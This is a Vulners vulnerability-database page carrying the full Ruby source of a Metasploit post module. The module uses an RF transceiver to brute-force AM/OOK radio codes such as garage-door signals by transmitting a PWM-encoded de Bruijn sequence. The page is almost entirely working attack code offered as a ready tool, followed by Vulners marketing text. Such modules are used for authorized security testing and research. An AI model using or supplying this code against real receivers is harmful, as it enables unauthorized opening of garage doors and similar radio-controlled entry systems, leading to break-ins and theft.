Vulners
Lucene search
Brute Force AM/OOK (ie: Garage Doors)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Hardware::RFTransceiver::RFTransceiver
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Brute Force AM/OOK (ie: Garage Doors)',
'Description' => %q{
Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw
binary signals. This is a port of the rfpwnon tool by Corey Harding.
(https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)
},
'License' => MSF_LICENSE,
'Author' => ['Craig Smith'],
'Platform' => ['hardware'],
'SessionTypes' => ['hwbridge']
)
)
register_options([
OptInt.new('FREQ', [true, 'Frequency to transmit on']),
OptInt.new('BAUD', [false, 'Baud rate to use', 2000]),
OptInt.new('BINLENGTH', [false, 'Binary Length of signal to brute force', 8]),
OptInt.new('REPEAT', [false, 'Number of times to repeat the signal', 5]),
OptString.new('PPAD', [false, 'Specify your own binary padding before the brute forced binary', nil]),
OptString.new('TPAD', [false, 'Specify your own binary padding after the brute forced binary', nil]),
OptBool.new('RAW', [false, 'When set, disables PWM encoding. BINLENGTH must be -1', false]),
OptBool.new('TRI', [false, 'When set, brute foces a trinary signal.', false]),
OptBool.new('EXTRAVERBOSE', [false, 'More verbose', false]),
OptInt.new('INDEX', [false, 'USB Index to use', 0]),
OptInt.new('DELAY', [false, 'Delay in milliseconds between transmissions', 500])
])
@zeropwm = '1110'
@onepwm = '1000'
@brutechar = '01'
end
# @param key [String] binary/trinary represntation
# @return [Array] ByteArray
def convert_ook(key)
pwm_str_key = ''
key.each_char do |k|
x = '*'
case k
when '0'
x = @zeropwm
when '1'
x = @onepwm
when '2'
x = @twopwm
end
pwm_str_key += x
end
return pwm_str_key.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }
end
def debruijn_bytes(k, n)
@a = [0]
@sequence = []
debruijn(1, 1, k, n)
return @sequence.join
end
def debruijn(t, p, k, n)
if t > n
if n % p == 0
1.upto(p) { |j| @sequence << @a[j] }
end
else
@a[t] = @a[t - p]
debruijn(t + 1, p, k, n)
(@a[t - p] + 1).upto(k - 1) do |j|
@a[t] = j
debruijn(t + 1, t, k, n)
end
end
end
def run
unless is_rf?
print_error('Not an RF Transceiver')
return
end
unless set_index(datastore['INDEX'])
print_error("Couldn't set usb index to #{datastore['INDEX']}")
return
end
if datastore['TRI']
@zeropwm = '10001000'
@onepwm = '11101110'
@twopwm = '10001110'
@brutechar = '012'
end
set_modulation('ASK/OOK')
set_freq(datastore['FREQ'])
set_sync_mode(0)
set_baud(datastore['BAUD'])
max_power
print_status('Generating de bruijn sequence...')
seq = debruijn_bytes(@brutechar.length, datastore['BINLENGTH'])
tail = seq[0, datastore['BINLENGTH'] - 1]
brutepacket = seq + tail
print_status("Brute forcing frequency: #{datastore['FREQ']}")
print_status("Padding before binary: #{datastore['PPAD']}") if datastore['PPAD']
print_status("Padding after binary: #{datastore['TPAD']}") if datastore['TPAD']
print_status("De Bruijin Sequence: #{brutepacket}") if datastore['EXTRAVERBOSE']
startn = 0
endy = 512
brutepackettmp = ''
addr = 512
if datastore['TRI']
endy = 128
addr = 128
end
if datastore['REPEAT'] >= 2 || datastore['PPAD'] || datastore['TPAD']
endy = datastore['BINLENGTH']
addr = 1
end
# Transmit
while startn < brutepacket.length
(0..datastore['REPEAT'] - 1).each do |_i|
brutepackettemp = brutepacket[startn..endy - 1]
next if brutepackettemp.length < datastore['BINLENGTH']
# Pad if asked to
brutepackettemp = datastore['PPAD'] + brutepackettemp if datastore['PPAD']
brutepackettemp += datastore['TPAD'] if datastore['TPAD']
if datastore['RAW']
key_packed = brutepackettemp.scan(/.{1,8}/).collect { |x| x.to_i(2).chr }
else
key_packed = convert_ook(brutepackettemp)
end
print_status('Transmitting...')
set_flen(key_packed.length)
rfxmit(key_packed.join)
print_status('Binary before PWM encoding:')
print_status(brutepackettemp.to_s)
print_status('Binary after PWM encoding:')
print_status(key_packed.join.unpack('H*')[0].hex.to_s(2).to_s)
sleep(datastore['DELAY'] / 1000) if datastore['DELAY'] > 0
end
if (datastore['REPEAT'] >= 2) || datastore['PPAD'] || datastore['TPAD']
startn += addr
endy += addr
else
startn = startn + addr - datastore['BINLENGTH']
endy = endy + addr - datastore['BINLENGTH']
end
end
print_status('Done')
set_mode('IDLE')
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Feb 2023 13:47Current
7.4High risk
Vulners AI Score7.4